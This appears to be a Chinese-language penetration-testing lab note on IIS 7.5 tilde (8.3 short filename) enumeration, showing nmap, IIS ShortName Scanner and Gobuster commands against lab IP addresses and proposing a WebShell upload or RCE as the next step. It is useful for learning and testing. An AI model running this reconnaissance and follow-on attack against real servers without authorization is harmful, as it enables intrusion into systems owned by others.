IIS Tilde

🔍 1. 發現點

📌 目標

  • Microsoft IIS 7.5

  • 可能存在的漏洞:IIS Tilde Enumeration (8.3 短檔案名稱枚舉漏洞)

🛠 掃描目標

使用 nmap 進行端口掃描,確認 IIS 伺服器版本:

nmap -p- -sV -sC --open 10.129.224.91

發現 IIS 7.5 在 port 80 運行,該版本可能易受 Tilde 枚舉攻擊。

🚀 2. 測試Payload

📂 使用 IIS ShortName Scanner 進行枚舉

java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

掃描結果:

  • 識別目錄: ASPNET~1, UPLOAD~1

  • 識別文件: CSASPX~1.CS, TRANSF~1.ASP

📂 使用 Gobuster 暴力破解完整檔名

🔹 產生字典

egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt

🔹 使用 Gobuster 嘗試解析完整檔名

gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp

結果:

  • 確認 TRANSF~1.ASP 完整檔名為 transfers.aspx

🎯 3. 利用漏洞

  • 已發現可疑 ASPX 文件

  • 下一步:嘗試上傳 WebShell 或利用已知漏洞進行 RCE

🔗 5. 連鎖漏洞

IIS Tilde 枚舉發現隱藏檔案與目錄Gobuster 枚舉解析完整檔案名稱進一步測試該 ASPX 檔案是否可用來上傳 WebShell 或執行 RCE

上一页ColdFusion下一页LDAP

最后更新于

这有帮助吗?